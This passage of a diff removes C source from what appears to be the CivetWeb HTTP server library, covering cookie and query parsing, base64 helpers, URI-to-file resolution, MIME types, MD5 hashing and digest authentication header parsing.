-	const char *p, *e, *s;
-	size_t name_len;
-	int len;
-
-	if ((dst == NULL) || (dst_len == 0)) {
-		len = -2;
-	} else if ((data == NULL) || (name == NULL) || (data_len == 0)) {
-		len = -1;
-		dst[0] = '\0';
-	} else {
-		name_len = strlen(name);
-		e = data + data_len;
-		len = -1;
-		dst[0] = '\0';
-
-		/* data is "var1=val1&var2=val2...". Find variable first */
-		for (p = data; p + name_len < e; p++) {
-			if (((p == data) || (p[-1] == '&')) && (p[name_len] == '=')
-			    && !mg_strncasecmp(name, p, name_len) && 0 == occurrence--) {
-				/* Point p to variable value */
-				p += name_len + 1;
-
-				/* Point s to the end of the value */
-				s = (const char *)memchr(p, '&', (size_t)(e - p));
-				if (s == NULL) {
-					s = e;
-				}
-				/* assert(s >= p); */
-				if (s < p) {
-					return -3;
-				}
-
-				/* Decode variable into destination buffer */
-				len = mg_url_decode(p, (int)(s - p), dst, (int)dst_len, 1);
-
-				/* Redirect error code from -1 to -2 (destination buffer too
-				 * small). */
-				if (len == -1) {
-					len = -2;
-				}
-				break;
-			}
-		}
-	}
-
-	return len;
-}
-
-
-/* HCP24: some changes to compare hole var_name */
-int
-mg_get_cookie(const char *cookie_header,
-              const char *var_name,
-              char *dst,
-              size_t dst_size)
-{
-	const char *s, *p, *end;
-	int name_len, len = -1;
-
-	if ((dst == NULL) || (dst_size == 0)) {
-		return -2;
-	}
-
-	dst[0] = '\0';
-	if ((var_name == NULL) || ((s = cookie_header) == NULL)) {
-		return -1;
-	}
-
-	name_len = (int)strlen(var_name);
-	end = s + strlen(s);
-	for (; (s = mg_strcasestr(s, var_name)) != NULL; s += name_len) {
-		if (s[name_len] == '=') {
-			/* HCP24: now check is it a substring or a full cookie name */
-			if ((s == cookie_header) || (s[-1] == ' ')) {
-				s += name_len + 1;
-				if ((p = strchr(s, ' ')) == NULL) {
-					p = end;
-				}
-				if (p[-1] == ';') {
-					p--;
-				}
-				if ((*s == '"') && (p[-1] == '"') && (p > s + 1)) {
-					s++;
-					p--;
-				}
-				if ((size_t)(p - s) < dst_size) {
-					len = (int)(p - s);
-					mg_strlcpy(dst, s, (size_t)len + 1);
-				} else {
-					len = -3;
-				}
-				break;
-			}
-		}
-	}
-	return len;
-}
-
-
-#if defined(USE_WEBSOCKET) || defined(USE_LUA)
-static void
-base64_encode(const unsigned char *src, int src_len, char *dst)
-{
-	static const char *b64 =
-	    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
-	int i, j, a, b, c;
-
-	for (i = j = 0; i < src_len; i += 3) {
-		a = src[i];
-		b = ((i + 1) >= src_len) ? 0 : src[i + 1];
-		c = ((i + 2) >= src_len) ? 0 : src[i + 2];
-
-		dst[j++] = b64[a >> 2];
-		dst[j++] = b64[((a & 3) << 4) | (b >> 4)];
-		if (i + 1 < src_len) {
-			dst[j++] = b64[(b & 15) << 2 | (c >> 6)];
-		}
-		if (i + 2 < src_len) {
-			dst[j++] = b64[c & 63];
-		}
-	}
-	while (j % 4 != 0) {
-		dst[j++] = '=';
-	}
-	dst[j++] = '\0';
-}
-#endif
-
-
-#if defined(USE_LUA)
-static unsigned char
-b64reverse(char letter)
-{
-	if ((letter >= 'A') && (letter <= 'Z')) {
-		return letter - 'A';
-	}
-	if ((letter >= 'a') && (letter <= 'z')) {
-		return letter - 'a' + 26;
-	}
-	if ((letter >= '0') && (letter <= '9')) {
-		return letter - '0' + 52;
-	}
-	if (letter == '+') {
-		return 62;
-	}
-	if (letter == '/') {
-		return 63;
-	}
-	if (letter == '=') {
-		return 255; /* normal end */
-	}
-	return 254; /* error */
-}
-
-
-static int
-base64_decode(const unsigned char *src, int src_len, char *dst, size_t *dst_len)
-{
-	int i;
-	unsigned char a, b, c, d;
-
-	*dst_len = 0;
-
-	for (i = 0; i < src_len; i += 4) {
-		a = b64reverse(src[i]);
-		if (a >= 254) {
-			return i;
-		}
-
-		b = b64reverse(((i + 1) >= src_len) ? 0 : src[i + 1]);
-		if (b >= 254) {
-			return i + 1;
-		}
-
-		c = b64reverse(((i + 2) >= src_len) ? 0 : src[i + 2]);
-		if (c == 254) {
-			return i + 2;
-		}
-
-		d = b64reverse(((i + 3) >= src_len) ? 0 : src[i + 3]);
-		if (d == 254) {
-			return i + 3;
-		}
-
-		dst[(*dst_len)++] = (a << 2) + (b >> 4);
-		if (c != 255) {
-			dst[(*dst_len)++] = (b << 4) + (c >> 2);
-			if (d != 255) {
-				dst[(*dst_len)++] = (c << 6) + d;
-			}
-		}
-	}
-	return -1;
-}
-#endif
-
-
-static int
-is_put_or_delete_method(const struct mg_connection *conn)
-{
-	if (conn) {
-		const char *s = conn->request_info.request_method;
-		return (s != NULL) && (!strcmp(s, "PUT") || !strcmp(s, "DELETE")
-		                       || !strcmp(s, "MKCOL") || !strcmp(s, "PATCH"));
-	}
-	return 0;
-}
-
-
-#if !defined(NO_FILES)
-static int
-extention_matches_script(
-    struct mg_connection *conn, /* in: request (must be valid) */
-    const char *filename        /* in: filename  (must be valid) */
-    )
-{
-#if !defined(NO_CGI)
-	if (match_prefix(conn->ctx->config[CGI_EXTENSIONS],
-	                 strlen(conn->ctx->config[CGI_EXTENSIONS]),
-	                 filename) > 0) {
-		return 1;
-	}
-#endif
-#if defined(USE_LUA)
-	if (match_prefix(conn->ctx->config[LUA_SCRIPT_EXTENSIONS],
-	                 strlen(conn->ctx->config[LUA_SCRIPT_EXTENSIONS]),
-	                 filename) > 0) {
-		return 1;
-	}
-#endif
-#if defined(USE_DUKTAPE)
-	if (match_prefix(conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS],
-	                 strlen(conn->ctx->config[DUKTAPE_SCRIPT_EXTENSIONS]),
-	                 filename) > 0) {
-		return 1;
-	}
-#endif
-	/* filename and conn could be unused, if all preocessor conditions
-	 * are false (no script language supported). */
-	(void)filename;
-	(void)conn;
-
-	return 0;
-}
-
-
-/* For given directory path, substitute it to valid index file.
- * Return 1 if index file has been found, 0 if not found.
- * If the file is found, it's stats is returned in stp. */
-static int
-substitute_index_file(struct mg_connection *conn,
-                      char *path,
-                      size_t path_len,
-                      struct mg_file_stat *filestat)
-{
-	const char *list = conn->ctx->config[INDEX_FILES];
-	struct vec filename_vec;
-	size_t n = strlen(path);
-	int found = 0;
-
-	/* The 'path' given to us points to the directory. Remove all trailing
-	 * directory separator characters from the end of the path, and
-	 * then append single directory separator character. */
-	while ((n > 0) && (path[n - 1] == '/')) {
-		n--;
-	}
-	path[n] = '/';
-
-	/* Traverse index files list. For each entry, append it to the given
-	 * path and see if the file exists. If it exists, break the loop */
-	while ((list = next_option(list, &filename_vec, NULL)) != NULL) {
-		/* Ignore too long entries that may overflow path buffer */
-		if (filename_vec.len > (path_len - (n + 2))) {
-			continue;
-		}
-
-		/* Prepare full path to the index file */
-		mg_strlcpy(path + n + 1, filename_vec.ptr, filename_vec.len + 1);
-
-		/* Does it exist? */
-		if (mg_stat(conn, path, filestat)) {
-			/* Yes it does, break the loop */
-			found = 1;
-			break;
-		}
-	}
-
-	/* If no index file exists, restore directory path */
-	if (!found) {
-		path[n] = '\0';
-	}
-
-	return found;
-}
-#endif
-
-
-static void
-interpret_uri(struct mg_connection *conn, /* in/out: request (must be valid) */
-              char *filename,             /* out: filename */
-              size_t filename_buf_len,    /* in: size of filename buffer */
-              struct mg_file_stat *filestat, /* out: file status structure */
-              int *is_found,                 /* out: file found (directly) */
-              int *is_script_resource,       /* out: handled by a script? */
-              int *is_websocket_request,     /* out: websocket connetion? */
-              int *is_put_or_delete_request  /* out: put/delete a file? */
-              )
-{
-	char const *accept_encoding;
-
-#if !defined(NO_FILES)
-	const char *uri = conn->request_info.local_uri;
-	const char *root = conn->ctx->config[DOCUMENT_ROOT];
-	const char *rewrite;
-	struct vec a, b;
-	int match_len;
-	char gz_path[PATH_MAX];
-	int truncated;
-#if !defined(NO_CGI) || defined(USE_LUA) || defined(USE_DUKTAPE)
-	char *tmp_str;
-	size_t tmp_str_len, sep_pos;
-	int allow_substitute_script_subresources;
-#endif
-#else
-	(void)filename_buf_len; /* unused if NO_FILES is defined */
-#endif
-
-	/* Step 1: Set all initially unknown outputs to zero */
-	memset(filestat, 0, sizeof(*filestat));
-	*filename = 0;
-	*is_found = 0;
-	*is_script_resource = 0;
-
-	/* Step 2: Check if the request attempts to modify the file system */
-	*is_put_or_delete_request = is_put_or_delete_method(conn);
-
-/* Step 3: Check if it is a websocket request, and modify the document
- * root if required */
-#if defined(USE_WEBSOCKET)
-	*is_websocket_request = is_websocket_protocol(conn);
-#if !defined(NO_FILES)
-	if (*is_websocket_request && conn->ctx->config[WEBSOCKET_ROOT]) {
-		root = conn->ctx->config[WEBSOCKET_ROOT];
-	}
-#endif /* !NO_FILES */
-#else  /* USE_WEBSOCKET */
-	*is_websocket_request = 0;
-#endif /* USE_WEBSOCKET */
-
-	/* Step 4: Check if gzip encoded response is allowed */
-	conn->accept_gzip = 0;
-	if ((accept_encoding = mg_get_header(conn, "Accept-Encoding")) != NULL) {
-		if (strstr(accept_encoding, "gzip") != NULL) {
-			conn->accept_gzip = 1;
-		}
-	}
-
-#if !defined(NO_FILES)
-	/* Step 5: If there is no root directory, don't look for files. */
-	/* Note that root == NULL is a regular use case here. This occurs,
-	 * if all requests are handled by callbacks, so the WEBSOCKET_ROOT
-	 * config is not required. */
-	if (root == NULL) {
-		/* all file related outputs have already been set to 0, just return
-		 */
-		return;
-	}
-
-	/* Step 6: Determine the local file path from the root path and the
-	 * request uri. */
-	/* Using filename_buf_len - 1 because memmove() for PATH_INFO may shift
-	 * part of the path one byte on the right. */
-	mg_snprintf(
-	    conn, &truncated, filename, filename_buf_len - 1, "%s%s", root, uri);
-
-	if (truncated) {
-		goto interpret_cleanup;
-	}
-
-	/* Step 7: URI rewriting */
-	rewrite = conn->ctx->config[URL_REWRITE_PATTERN];
-	while ((rewrite = next_option(rewrite, &a, &b)) != NULL) {
-		if ((match_len = match_prefix(a.ptr, a.len, uri)) > 0) {
-			mg_snprintf(conn,
-			            &truncated,
-			            filename,
-			            filename_buf_len - 1,
-			            "%.*s%s",
-			            (int)b.len,
-			            b.ptr,
-			            uri + match_len);
-			break;
-		}
-	}
-
-	if (truncated) {
-		goto interpret_cleanup;
-	}
-
-	/* Step 8: Check if the file exists at the server */
-	/* Local file path and name, corresponding to requested URI
-	 * is now stored in "filename" variable. */
-	if (mg_stat(conn, filename, filestat)) {
-		/* 8.1: File exists. */
-		*is_found = 1;
-
-		/* 8.2: Check if it is a script type. */
-		if (extention_matches_script(conn, filename)) {
-			/* The request addresses a CGI resource, Lua script or
-			 * server-side javascript.
-			 * The URI corresponds to the script itself (like
-			 * /path/script.cgi), and there is no additional resource
-			 * path (like /path/script.cgi/something).
-			 * Requests that modify (replace or delete) a resource, like
-			 * PUT and DELETE requests, should replace/delete the script
-			 * file.
-			 * Requests that read or write from/to a resource, like GET and
-			 * POST requests, should call the script and return the
-			 * generated response. */
-			*is_script_resource = (!*is_put_or_delete_request);
-		}
-
-		/* 8.3: If the request target is a directory, there could be
-		 * a substitute file (index.html, index.cgi, ...). */
-		if (filestat->is_directory) {
-			/* Use a local copy here, since substitute_index_file will
-			 * change the content of the file status */
-			struct mg_file_stat tmp_filestat;
-			memset(&tmp_filestat, 0, sizeof(tmp_filestat));
-
-			if (substitute_index_file(
-			        conn, filename, filename_buf_len, &tmp_filestat)) {
-
-				/* Substitute file found. Copy stat to the output, then
-				 * check if the file is a script file */
-				*filestat = tmp_filestat;
-
-				if (extention_matches_script(conn, filename)) {
-					/* Substitute file is a script file */
-					*is_script_resource = 1;
-				} else {
-					/* Substitute file is a regular file */
-					*is_script_resource = 0;
-					*is_found = (mg_stat(conn, filename, filestat) ? 1 : 0);
-				}
-			}
-			/* If there is no substitute file, the server could return
-			 * a directory listing in a later step */
-		}
-		return;
-	}
-
-	/* Step 9: Check for zipped files: */
-	/* If we can't find the actual file, look for the file
-	 * with the same name but a .gz extension. If we find it,
-	 * use that and set the gzipped flag in the file struct
-	 * to indicate that the response need to have the content-
-	 * encoding: gzip header.
-	 * We can only do this if the browser declares support. */
-	if (conn->accept_gzip) {
-		mg_snprintf(
-		    conn, &truncated, gz_path, sizeof(gz_path), "%s.gz", filename);
-
-		if (truncated) {
-			goto interpret_cleanup;
-		}
-
-		if (mg_stat(conn, gz_path, filestat)) {
-			if (filestat) {
-				filestat->is_gzipped = 1;
-				*is_found = 1;
-			}
-			/* Currently gz files can not be scripts. */
-			return;
-		}
-	}
-
-#if !defined(NO_CGI) || defined(USE_LUA) || defined(USE_DUKTAPE)
-	/* Step 10: Script resources may handle sub-resources */
-	/* Support PATH_INFO for CGI scripts. */
-	tmp_str_len = strlen(filename);
-	tmp_str = (char *)mg_malloc_ctx(tmp_str_len + PATH_MAX + 1, conn->ctx);
-	if (!tmp_str) {
-		/* Out of memory */
-		goto interpret_cleanup;
-	}
-	memcpy(tmp_str, filename, tmp_str_len + 1);
-
-	/* Check config, if index scripts may have sub-resources */
-	allow_substitute_script_subresources =
-	    !mg_strcasecmp(conn->ctx->config[ALLOW_INDEX_SCRIPT_SUB_RES], "yes");
-
-	sep_pos = tmp_str_len;
-	while (sep_pos > 0) {
-		sep_pos--;
-		if (tmp_str[sep_pos] == '/') {
-			int is_script = 0, does_exist = 0;
-
-			tmp_str[sep_pos] = 0;
-			if (tmp_str[0]) {
-				is_script = extention_matches_script(conn, tmp_str);
-				does_exist = mg_stat(conn, tmp_str, filestat);
-			}
-
-			if (does_exist && is_script) {
-				filename[sep_pos] = 0;
-				memmove(filename + sep_pos + 2,
-				        filename + sep_pos + 1,
-				        strlen(filename + sep_pos + 1) + 1);
-				conn->path_info = filename + sep_pos + 1;
-				filename[sep_pos + 1] = '/';
-				*is_script_resource = 1;
-				*is_found = 1;
-				break;
-			}
-
-			if (allow_substitute_script_subresources) {
-				if (substitute_index_file(
-				        conn, tmp_str, tmp_str_len + PATH_MAX, filestat)) {
-
-					/* some intermediate directory has an index file */
-					if (extention_matches_script(conn, tmp_str)) {
-
-						char *tmp_str2;
-
-						DEBUG_TRACE("Substitute script %s serving path %s",
-						            tmp_str,
-						            filename);
-
-						/* this index file is a script */
-						tmp_str2 = mg_strdup(filename + sep_pos + 1);
-						mg_snprintf(conn,
-						            &truncated,
-						            filename,
-						            filename_buf_len,
-						            "%s//%s",
-						            tmp_str,
-						            tmp_str2);
-						mg_free(tmp_str2);
-
-						if (truncated) {
-							mg_free(tmp_str);
-							goto interpret_cleanup;
-						}
-						sep_pos = strlen(tmp_str);
-						filename[sep_pos] = 0;
-						conn->path_info = filename + sep_pos + 1;
-						*is_script_resource = 1;
-						*is_found = 1;
-						break;
-
-					} else {
-
-						DEBUG_TRACE("Substitute file %s serving path %s",
-						            tmp_str,
-						            filename);
-
-						/* non-script files will not have sub-resources */
-						filename[sep_pos] = 0;
-						conn->path_info = 0;
-						*is_script_resource = 0;
-						*is_found = 0;
-						break;
-					}
-				}
-			}
-
-			tmp_str[sep_pos] = '/';
-		}
-	}
-
-	mg_free(tmp_str);
-
-#endif /* !defined(NO_CGI) || defined(USE_LUA) || defined(USE_DUKTAPE) */
-#endif /* !defined(NO_FILES) */
-	return;
-
-#if !defined(NO_FILES)
-/* Reset all outputs */
-interpret_cleanup:
-	memset(filestat, 0, sizeof(*filestat));
-	*filename = 0;
-	*is_found = 0;
-	*is_script_resource = 0;
-	*is_websocket_request = 0;
-	*is_put_or_delete_request = 0;
-#endif /* !defined(NO_FILES) */
-}
-
-
-/* Check whether full request is buffered. Return:
- * -1  if request or response is malformed
- *  0  if request or response is not yet fully buffered
- * >0  actual request length, including last \r\n\r\n */
-static int
-get_http_header_len(const char *buf, int buflen)
-{
-	int i;
-	for (i = 0; i < buflen; i++) {
-		/* Do an unsigned comparison in some conditions below */
-		const unsigned char c = ((const unsigned char *)buf)[i];
-
-		if ((c < 128) && ((char)c != '\r') && ((char)c != '\n')
-		    && !isprint(c)) {
-			/* abort scan as soon as one malformed character is found */
-			return -1;
-		}
-
-		if (i < buflen - 1) {
-			if ((buf[i] == '\n') && (buf[i + 1] == '\n')) {
-				/* Two newline, no carriage return - not standard compliant,
-				 * but
-				 * it
-				 * should be accepted */
-				return i + 2;
-			}
-		}
-
-		if (i < buflen - 3) {
-			if ((buf[i] == '\r') && (buf[i + 1] == '\n') && (buf[i + 2] == '\r')
-			    && (buf[i + 3] == '\n')) {
-				/* Two \r\n - standard compliant */
-				return i + 4;
-			}
-		}
-	}
-
-	return 0;
-}
-
-
-#if !defined(NO_CACHING)
-/* Convert month to the month number. Return -1 on error, or month number */
-static int
-get_month_index(const char *s)
-{
-	size_t i;
-
-	for (i = 0; i < ARRAY_SIZE(month_names); i++) {
-		if (!strcmp(s, month_names[i])) {
-			return (int)i;
-		}
-	}
-
-	return -1;
-}
-
-
-/* Parse UTC date-time string, and return the corresponding time_t value. */
-static time_t
-parse_date_string(const char *datetime)
-{
-	char month_str[32] = {0};
-	int second, minute, hour, day, month, year;
-	time_t result = (time_t)0;
-	struct tm tm;
-
-	if ((sscanf(datetime,
-	            "%d/%3s/%d %d:%d:%d",
-	            &day,
-	            month_str,
-	            &year,
-	            &hour,
-	            &minute,
-	            &second) == 6) || (sscanf(datetime,
-	                                      "%d %3s %d %d:%d:%d",
-	                                      &day,
-	                                      month_str,
-	                                      &year,
-	                                      &hour,
-	                                      &minute,
-	                                      &second) == 6)
-	    || (sscanf(datetime,
-	               "%*3s, %d %3s %d %d:%d:%d",
-	               &day,
-	               month_str,
-	               &year,
-	               &hour,
-	               &minute,
-	               &second) == 6) || (sscanf(datetime,
-	                                         "%d-%3s-%d %d:%d:%d",
-	                                         &day,
-	                                         month_str,
-	                                         &year,
-	                                         &hour,
-	                                         &minute,
-	                                         &second) == 6)) {
-		month = get_month_index(month_str);
-		if ((month >= 0) && (year >= 1970)) {
-			memset(&tm, 0, sizeof(tm));
-			tm.tm_year = year - 1900;
-			tm.tm_mon = month;
-			tm.tm_mday = day;
-			tm.tm_hour = hour;
-			tm.tm_min = minute;
-			tm.tm_sec = second;
-			result = timegm(&tm);
-		}
-	}
-
-	return result;
-}
-#endif /* !NO_CACHING */
-
-
-/* Protect against directory disclosure attack by removing '..',
- * excessive '/' and '\' characters */
-static void
-remove_double_dots_and_double_slashes(char *s)
-{
-	char *p = s;
-
-	while ((s[0] == '.') && (s[1] == '.')) {
-		s++;
-	}
-
-	while (*s != '\0') {
-		*p++ = *s++;
-		if ((s[-1] == '/') || (s[-1] == '\\')) {
-			/* Skip all following slashes, backslashes and double-dots */
-			while (s[0] != '\0') {
-				if ((s[0] == '/') || (s[0] == '\\')) {
-					s++;
-				} else if ((s[0] == '.') && (s[1] == '.')) {
-					s += 2;
-				} else {
-					break;
-				}
-			}
-		}
-	}
-	*p = '\0';
-}
-
-
-static const struct {
-	const char *extension;
-	size_t ext_len;
-	const char *mime_type;
-} builtin_mime_types[] = {
-    /* IANA registered MIME types
-     * (http://www.iana.org/assignments/media-types)
-     * application types */
-    {".doc", 4, "application/msword"},
-    {".eps", 4, "application/postscript"},
-    {".exe", 4, "application/octet-stream"},
-    {".js", 3, "application/javascript"},
-    {".json", 5, "application/json"},
-    {".pdf", 4, "application/pdf"},
-    {".ps", 3, "application/postscript"},
-    {".rtf", 4, "application/rtf"},
-    {".xhtml", 6, "application/xhtml+xml"},
-    {".xsl", 4, "application/xml"},
-    {".xslt", 5, "application/xml"},
-
-    /* fonts */
-    {".ttf", 4, "application/font-sfnt"},
-    {".cff", 4, "application/font-sfnt"},
-    {".otf", 4, "application/font-sfnt"},
-    {".aat", 4, "application/font-sfnt"},
-    {".sil", 4, "application/font-sfnt"},
-    {".pfr", 4, "application/font-tdpfr"},
-    {".woff", 5, "application/font-woff"},
-
-    /* audio */
-    {".mp3", 4, "audio/mpeg"},
-    {".oga", 4, "audio/ogg"},
-    {".ogg", 4, "audio/ogg"},
-
-    /* image */
-    {".gif", 4, "image/gif"},
-    {".ief", 4, "image/ief"},
-    {".jpeg", 5, "image/jpeg"},
-    {".jpg", 4, "image/jpeg"},
-    {".jpm", 4, "image/jpm"},
-    {".jpx", 4, "image/jpx"},
-    {".png", 4, "image/png"},
-    {".svg", 4, "image/svg+xml"},
-    {".tif", 4, "image/tiff"},
-    {".tiff", 5, "image/tiff"},
-
-    /* model */
-    {".wrl", 4, "model/vrml"},
-
-    /* text */
-    {".css", 4, "text/css"},
-    {".csv", 4, "text/csv"},
-    {".htm", 4, "text/html"},
-    {".html", 5, "text/html"},
-    {".sgm", 4, "text/sgml"},
-    {".shtm", 5, "text/html"},
-    {".shtml", 6, "text/html"},
-    {".txt", 4, "text/plain"},
-    {".xml", 4, "text/xml"},
-
-    /* video */
-    {".mov", 4, "video/quicktime"},
-    {".mp4", 4, "video/mp4"},
-    {".mpeg", 5, "video/mpeg"},
-    {".mpg", 4, "video/mpeg"},
-    {".ogv", 4, "video/ogg"},
-    {".qt", 3, "video/quicktime"},
-
-    /* not registered types
-     * (http://reference.sitepoint.com/html/mime-types-full,
-     * http://www.hansenb.pdx.edu/DMKB/dict/tutorials/mime_typ.php, ..) */
-    {".arj", 4, "application/x-arj-compressed"},
-    {".gz", 3, "application/x-gunzip"},
-    {".rar", 4, "application/x-arj-compressed"},
-    {".swf", 4, "application/x-shockwave-flash"},
-    {".tar", 4, "application/x-tar"},
-    {".tgz", 4, "application/x-tar-gz"},
-    {".torrent", 8, "application/x-bittorrent"},
-    {".ppt", 4, "application/x-mspowerpoint"},
-    {".xls", 4, "application/x-msexcel"},
-    {".zip", 4, "application/x-zip-compressed"},
-    {".aac",
-     4,
-     "audio/aac"}, /* http://en.wikipedia.org/wiki/Advanced_Audio_Coding */
-    {".aif", 4, "audio/x-aif"},
-    {".m3u", 4, "audio/x-mpegurl"},
-    {".mid", 4, "audio/x-midi"},
-    {".ra", 3, "audio/x-pn-realaudio"},
-    {".ram", 4, "audio/x-pn-realaudio"},
-    {".wav", 4, "audio/x-wav"},
-    {".bmp", 4, "image/bmp"},
-    {".ico", 4, "image/x-icon"},
-    {".pct", 4, "image/x-pct"},
-    {".pict", 5, "image/pict"},
-    {".rgb", 4, "image/x-rgb"},
-    {".webm", 5, "video/webm"}, /* http://en.wikipedia.org/wiki/WebM */
-    {".asf", 4, "video/x-ms-asf"},
-    {".avi", 4, "video/x-msvideo"},
-    {".m4v", 4, "video/x-m4v"},
-    {NULL, 0, NULL}};
-
-
-const char *
-mg_get_builtin_mime_type(const char *path)
-{
-	const char *ext;
-	size_t i, path_len;
-
-	path_len = strlen(path);
-
-	for (i = 0; builtin_mime_types[i].extension != NULL; i++) {
-		ext = path + (path_len - builtin_mime_types[i].ext_len);
-		if ((path_len > builtin_mime_types[i].ext_len)
-		    && (mg_strcasecmp(ext, builtin_mime_types[i].extension) == 0)) {
-			return builtin_mime_types[i].mime_type;
-		}
-	}
-
-	return "text/plain";
-}
-
-
-/* Look at the "path" extension and figure what mime type it has.
- * Store mime type in the vector. */
-static void
-get_mime_type(struct mg_context *ctx, const char *path, struct vec *vec)
-{
-	struct vec ext_vec, mime_vec;
-	const char *list, *ext;
-	size_t path_len;
-
-	path_len = strlen(path);
-
-	if ((ctx == NULL) || (vec == NULL)) {
-		if (vec != NULL) {
-			memset(vec, '\0', sizeof(struct vec));
-		}
-		return;
-	}
-
-	/* Scan user-defined mime types first, in case user wants to
-	 * override default mime types. */
-	list = ctx->config[EXTRA_MIME_TYPES];
-	while ((list = next_option(list, &ext_vec, &mime_vec)) != NULL) {
-		/* ext now points to the path suffix */
-		ext = path + path_len - ext_vec.len;
-		if (mg_strncasecmp(ext, ext_vec.ptr, ext_vec.len) == 0) {
-			*vec = mime_vec;
-			return;
-		}
-	}
-
-	vec->ptr = mg_get_builtin_mime_type(path);
-	vec->len = strlen(vec->ptr);
-}
-
-
-/* Stringify binary data. Output buffer must be twice as big as input,
- * because each byte takes 2 bytes in string representation */
-static void
-bin2str(char *to, const unsigned char *p, size_t len)
-{
-	static const char *hex = "0123456789abcdef";
-
-	for (; len--; p++) {
-		*to++ = hex[p[0] >> 4];
-		*to++ = hex[p[0] & 0x0f];
-	}
-	*to = '\0';
-}
-
-
-/* Return stringified MD5 hash for list of strings. Buffer must be 33 bytes.
- */
-char *
-mg_md5(char buf[33], ...)
-{
-	md5_byte_t hash[16];
-	const char *p;
-	va_list ap;
-	md5_state_t ctx;
-
-	md5_init(&ctx);
-
-	va_start(ap, buf);
-	while ((p = va_arg(ap, const char *)) != NULL) {
-		md5_append(&ctx, (const md5_byte_t *)p, strlen(p));
-	}
-	va_end(ap);
-
-	md5_finish(&ctx, hash);
-	bin2str(buf, hash, sizeof(hash));
-	return buf;
-}
-
-
-/* Check the user's password, return 1 if OK */
-static int
-check_password(const char *method,
-               const char *ha1,
-               const char *uri,
-               const char *nonce,
-               const char *nc,
-               const char *cnonce,
-               const char *qop,
-               const char *response)
-{
-	char ha2[32 + 1], expected_response[32 + 1];
-
-	/* Some of the parameters may be NULL */
-	if ((method == NULL) || (nonce == NULL) || (nc == NULL) || (cnonce == NULL)
-	    || (qop == NULL) || (response == NULL)) {
-		return 0;
-	}
-
-	/* NOTE(lsm): due to a bug in MSIE, we do not compare the URI */
-	if (strlen(response) != 32) {
-		return 0;
-	}
-
-	mg_md5(ha2, method, ":", uri, NULL);
-	mg_md5(expected_response,
-	       ha1,
-	       ":",
-	       nonce,
-	       ":",
-	       nc,
-	       ":",
-	       cnonce,
-	       ":",
-	       qop,
-	       ":",
-	       ha2,
-	       NULL);
-
-	return mg_strcasecmp(response, expected_response) == 0;
-}
-
-
-/* Use the global passwords file, if specified by auth_gpass option,
- * or search for .htpasswd in the requested directory. */
-static void
-open_auth_file(struct mg_connection *conn,
-               const char *path,
-               struct mg_file *filep)
-{
-	if ((conn != NULL) && (conn->ctx != NULL)) {
-		char name[PATH_MAX];
-		const char *p, *e, *gpass = conn->ctx->config[GLOBAL_PASSWORDS_FILE];
-		int truncated;
-
-		if (gpass != NULL) {
-			/* Use global passwords file */
-			if (!mg_fopen(conn, gpass, MG_FOPEN_MODE_READ, filep)) {
-#ifdef DEBUG
-				/* Use mg_cry here, since gpass has been configured. */
-				mg_cry(conn, "fopen(%s): %s", gpass, strerror(ERRNO));
-#endif
-			}
-			/* Important: using local struct mg_file to test path for
-			 * is_directory flag. If filep is used, mg_stat() makes it
-			 * appear as if auth file was opened.
-			 * TODO(mid): Check if this is still required after rewriting
-			 * mg_stat */
-		} else if (mg_stat(conn, path, &filep->stat)
-		           && filep->stat.is_directory) {
-			mg_snprintf(conn,
-			            &truncated,
-			            name,
-			            sizeof(name),
-			            "%s/%s",
-			            path,
-			            PASSWORDS_FILE_NAME);
-
-			if (truncated || !mg_fopen(conn, name, MG_FOPEN_MODE_READ, filep)) {
-#ifdef DEBUG
-				/* Don't use mg_cry here, but only a trace, since this is
-				 * a typical case. It will occur for every directory
-				 * without a password file. */
-				DEBUG_TRACE("fopen(%s): %s", name, strerror(ERRNO));
-#endif
-			}
-		} else {
-			/* Try to find .htpasswd in requested directory. */
-			for (p = path, e = p + strlen(p) - 1; e > p; e--) {
-				if (e[0] == '/') {
-					break;
-				}
-			}
-			mg_snprintf(conn,
-			            &truncated,
-			            name,
-			            sizeof(name),
-			            "%.*s/%s",
-			            (int)(e - p),
-			            p,
-			            PASSWORDS_FILE_NAME);
-
-			if (truncated || !mg_fopen(conn, name, MG_FOPEN_MODE_READ, filep)) {
-#ifdef DEBUG
-				/* Don't use mg_cry here, but only a trace, since this is
-				 * a typical case. It will occur for every directory
-				 * without a password file. */
-				DEBUG_TRACE("fopen(%s): %s", name, strerror(ERRNO));
-#endif
-			}
-		}
-	}
-}
-
-
-/* Parsed Authorization header */
-struct ah {
-	char *user, *uri, *cnonce, *response, *qop, *nc, *nonce;
-};
-
-
-/* Return 1 on success. Always initializes the ah structure. */
-static int
-parse_auth_header(struct mg_connection *conn,
-                  char *buf,
-                  size_t buf_size,
-                  struct ah *ah)
-{
-	char *name, *value, *s;
-	const char *auth_header;
-	uint64_t nonce;
-
-	if (!ah || !conn) {
-		return 0;
-	}
-
-	(void)memset(ah, 0, sizeof(*ah));
-	if (((auth_header = mg_get_header(conn, "Authorization")) == NULL)
-	    || mg_strncasecmp(auth_header, "Digest ", 7) != 0) {
-		return 0;
-	}
-
-	/* Make modifiable copy of the auth header */
-	(void)mg_strlcpy(buf, auth_header + 7, buf_size);
-	s = buf;
-
-	/* Parse authorization header */
-	for (;;) {
-		/* Gobble initial spaces */
-		while (isspace(*(unsigned char *)s)) {
-			s++;
-		}
-		name = skip_quoted(&s, "=", " ", 0);
-		/* Value is either quote-delimited, or ends at first comma or space.
-		 */
-		if (s[0] == '\"') {
-			s++;
-			value = skip_quoted(&s, "\"", " ", '\\');
-			if (s[0] == ',') {
-				s++;
-			}
-		} else {
-			value = skip_quoted(&s, ", ", " ", 0); /* IE uses commas, FF uses
-			                                        * spaces */
-		}
-		if (*name == '\0') {
-			break;
-		}
-
-		if (!strcmp(name, "username")) {
-			ah->user = value;
-		} else if (!strcmp(name, "cnonce")) {
-			ah->cnonce = value;
-		} else if (!strcmp(name, "response")) {
-			ah->response = value;
-		} else if (!strcmp(name, "uri")) {
-			ah->uri = value;
-		} else if (!strcmp(name, "qop")) {
-			ah->qop = value;
-		} else if (!strcmp(name, "nc")) {
-			ah->nc = value;
-		} else if (!strcmp(name, "nonce")) {
-			ah->nonce = value;
-		}
-	}
-
-#ifndef NO_NONCE_CHECK
-	/* Read the nonce from the response. */
-	if (ah->nonce == NULL) {
-		return 0;
-	}
-	s = NULL;
-	nonce = strtoull(ah->nonce, &s, 10);
-	if ((s == NULL) || (*s != 0)) {
